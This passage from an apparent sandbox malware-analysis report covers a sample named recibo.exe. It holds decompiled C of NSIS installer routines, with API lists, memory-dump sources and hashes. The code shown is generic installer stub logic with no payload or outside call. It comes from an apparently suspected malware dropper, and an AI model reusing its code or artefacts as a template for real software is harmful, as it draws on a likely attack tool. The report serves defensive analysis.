									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                  0x00406183
                                                                                  0x0040618c
                                                                                  0x00406193
                                                                                  0x0040619d
                                                                                  0x004061b1
                                                                                  0x004061d9
                                                                                  0x004061e4
                                                                                  0x004061e8
                                                                                  0x00406208
                                                                                  0x0040620f
                                                                                  0x00406219
                                                                                  0x00406226
                                                                                  0x0040622b
                                                                                  0x00406230
                                                                                  0x00406234
                                                                                  0x00406243
                                                                                  0x00406245
                                                                                  0x00406252
                                                                                  0x00406256
                                                                                  0x004062f1
                                                                                  0x00000000
                                                                                  0x0040626c
                                                                                  0x00406279
                                                                                  0x0040629d
                                                                                  0x004062a1
                                                                                  0x004062c0
                                                                                  0x004062c4
                                                                                  0x004062c4
                                                                                  0x004062c6
                                                                                  0x004062cf
                                                                                  0x004062da
                                                                                  0x004062e5
                                                                                  0x004062eb
                                                                                  0x00000000
                                                                                  0x004062eb
                                                                                  0x004062a3
                                                                                  0x004062a6
                                                                                  0x004062b1
                                                                                  0x004062ad
                                                                                  0x004062af
                                                                                  0x004062b0
                                                                                  0x004062b0
                                                                                  0x004062b8
                                                                                  0x004062ba
                                                                                  0x00000000
                                                                                  0x004062ba
                                                                                  0x00406284
                                                                                  0x0040628a
                                                                                  0x00000000
                                                                                  0x0040628a
                                                                                  0x00406256
                                                                                  0x00406234
                                                                                  0x004061b3
                                                                                  0x004061be
                                                                                  0x004061c7
                                                                                  0x004061cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004061cb
                                                                                  0x004062fc

                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                  • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                  • wsprintfA.USER32 ref: 00406202
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                  • API String ID: 2171350718-461813615
                                                                                  • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                  • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                  • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                  • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 72%
                                                                                  			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x5c09b6
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}






























                                                                                  0x0040657a
                                                                                  0x0040657a
                                                                                  0x0040657a
                                                                                  0x00406580
                                                                                  0x00406585
                                                                                  0x00406587
                                                                                  0x00406596
                                                                                  0x00406596
                                                                                  0x0040659e
                                                                                  0x0040659f
                                                                                  0x004065a0
                                                                                  0x004065a1
                                                                                  0x004065a4
                                                                                  0x004065ac
                                                                                  0x004065ae
                                                                                  0x004065bf
                                                                                  0x004065c2
                                                                                  0x004065c2
                                                                                  0x004065c6
                                                                                  0x004065cc
                                                                                  0x004065cf
                                                                                  0x004067aa
                                                                                  0x004067aa
                                                                                  0x004067b5
                                                                                  0x004067c1
                                                                                  0x004067c1
                                                                                  0x00000000
                                                                                  0x004065d5
                                                                                  0x004065da
                                                                                  0x004065ef
                                                                                  0x004065f0
                                                                                  0x004065f6
                                                                                  0x00406788
                                                                                  0x00406796
                                                                                  0x00406799
                                                                                  0x00406799
                                                                                  0x0040678a
                                                                                  0x0040678d
                                                                                  0x00406790
                                                                                  0x00406792
                                                                                  0x00406792
                                                                                  0x0040679b
                                                                                  0x0040679b
                                                                                  0x004067a1
                                                                                  0x004067a4
                                                                                  0x004065d7
                                                                                  0x00000000
                                                                                  0x004065d7
                                                                                  0x00000000
                                                                                  0x004067a4
                                                                                  0x004065fc
                                                                                  0x004065ff
                                                                                  0x0040660e
                                                                                  0x00406615
                                                                                  0x00406621
                                                                                  0x00406624
                                                                                  0x00406627
                                                                                  0x00406628
                                                                                  0x0040662d
                                                                                  0x00406633
                                                                                  0x00406636
                                                                                  0x00406639
                                                                                  0x0040672c
                                                                                  0x00406731
                                                                                  0x00406764
                                                                                  0x00406769
                                                                                  0x0040676e
                                                                                  0x00406773
                                                                                  0x00406773
                                                                                  0x00406778
                                                                                  0x0040677e
                                                                                  0x00406781
                                                                                  0x00000000
                                                                                  0x00406781
                                                                                  0x00406733
                                                                                  0x00406736
                                                                                  0x00406739
                                                                                  0x0040674e
                                                                                  0x00406755
                                                                                  0x0040673b
                                                                                  0x00406742
                                                                                  0x00406742
                                                                                  0x0040675d
                                                                                  0x00406760
                                                                                  0x00406724
                                                                                  0x00406725
                                                                                  0x00406725
                                                                                  0x00000000
                                                                                  0x00406760
                                                                                  0x00406646
                                                                                  0x0040664a
                                                                                  0x0040664a
                                                                                  0x0040664b
                                                                                  0x0040664d
                                                                                  0x0040668a
                                                                                  0x0040668d
                                                                                  0x0040669d
                                                                                  0x004066a0
                                                                                  0x004066a8
                                                                                  0x004066ae
                                                                                  0x004066ae
                                                                                  0x00406709
                                                                                  0x00406709
                                                                                  0x0040670b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004066b2
                                                                                  0x004066b7
                                                                                  0x004066b8
                                                                                  0x004066ba
                                                                                  0x004066d1
                                                                                  0x004066df
                                                                                  0x004066e5
                                                                                  0x004066e7
                                                                                  0x00406705
                                                                                  0x00406705
                                                                                  0x00406705
                                                                                  0x00000000
                                                                                  0x00406705
                                                                                  0x004066ed
                                                                                  0x004066f6
                                                                                  0x004066f9
                                                                                  0x004066ff
                                                                                  0x00406703
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406703
                                                                                  0x004066cb
                                                                                  0x004066cd
                                                                                  0x004066cf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004066cf
                                                                                  0x00000000
                                                                                  0x00406709
                                                                                  0x00406695
                                                                                  0x00000000
                                                                                  0x0040664f
                                                                                  0x0040666d
                                                                                  0x00406676
                                                                                  0x00406713
                                                                                  0x00406717
                                                                                  0x0040671f
                                                                                  0x0040671f
                                                                                  0x00000000
                                                                                  0x00406717
                                                                                  0x00406680
                                                                                  0x0040670d
                                                                                  0x00406711
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406711
                                                                                  0x0040664d
                                                                                  0x00000000
                                                                                  0x004065da

                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,00000000,004231B5,773423A0), ref: 004066A8
                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 4260037668-2117559163
                                                                                  • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                  • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                  • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                  • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00402F93 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x94236
					_t11 =  *0x42aa24; // 0x9423a
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                  0x00402fa3
                                                                                  0x00402fb1
                                                                                  0x00402fb7
                                                                                  0x00402fb7
                                                                                  0x00402fc5
                                                                                  0x00402fc7
                                                                                  0x00402fcd
                                                                                  0x00402fd4
                                                                                  0x00402fd6
                                                                                  0x00402fd6
                                                                                  0x00402fec
                                                                                  0x00402ffc
                                                                                  0x0040300e
                                                                                  0x0040300e
                                                                                  0x00403016

                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                  • MulDiv.KERNEL32(00094236,00000064,0009423A), ref: 00402FDC
                                                                                  • wsprintfW.USER32 ref: 00402FEC
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: 6B$:B$verifying installer: %d%%
                                                                                  • API String ID: 1451636040-3956744998
                                                                                  • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                  • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                  • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                  • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                  0x00404512
                                                                                  0x004045c8
                                                                                  0x00000000
                                                                                  0x004045c8
                                                                                  0x00404523
                                                                                  0x00404527
                                                                                  0x00000000
                                                                                  0x00404541
                                                                                  0x00404541
                                                                                  0x0040454a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040454c
                                                                                  0x00404558
                                                                                  0x0040455b
                                                                                  0x0040455b
                                                                                  0x00404561
                                                                                  0x00404567
                                                                                  0x00404567
                                                                                  0x00404573
                                                                                  0x00404579
                                                                                  0x00404580
                                                                                  0x00404583
                                                                                  0x00404586
                                                                                  0x00404588
                                                                                  0x00404588
                                                                                  0x00404590
                                                                                  0x00404596
                                                                                  0x00404596
                                                                                  0x004045a0
                                                                                  0x004045a5
                                                                                  0x004045a8
                                                                                  0x004045ad
                                                                                  0x004045b0
                                                                                  0x004045b0
                                                                                  0x004045c0
                                                                                  0x004045c0
                                                                                  0x00000000
                                                                                  0x004045c3

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                  • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                  • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                  • GetSysColor.USER32(?), ref: 00404586
                                                                                  • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                  • DeleteObject.GDI32(?), ref: 004045B0
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 91%
                                                                                  			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                  0x004067c6
                                                                                  0x004067cf
                                                                                  0x004067e6
                                                                                  0x004067e6
                                                                                  0x004067ed
                                                                                  0x004067f9
                                                                                  0x004067f9
                                                                                  0x004067fc
                                                                                  0x004067ff
                                                                                  0x00406804
                                                                                  0x00406806
                                                                                  0x0040680f
                                                                                  0x00406813
                                                                                  0x00406830
                                                                                  0x00406838
                                                                                  0x00406838
                                                                                  0x0040683d
                                                                                  0x0040683f
                                                                                  0x00406842
                                                                                  0x00406847
                                                                                  0x00406848
                                                                                  0x0040684c
                                                                                  0x0040684c
                                                                                  0x0040684d
                                                                                  0x00406854
                                                                                  0x00406856
                                                                                  0x0040685d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406865
                                                                                  0x0040686b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040686b
                                                                                  0x00406870

                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                  • CharNextW.USER32(?,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                  • CharPrevW.USER32(?,?,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
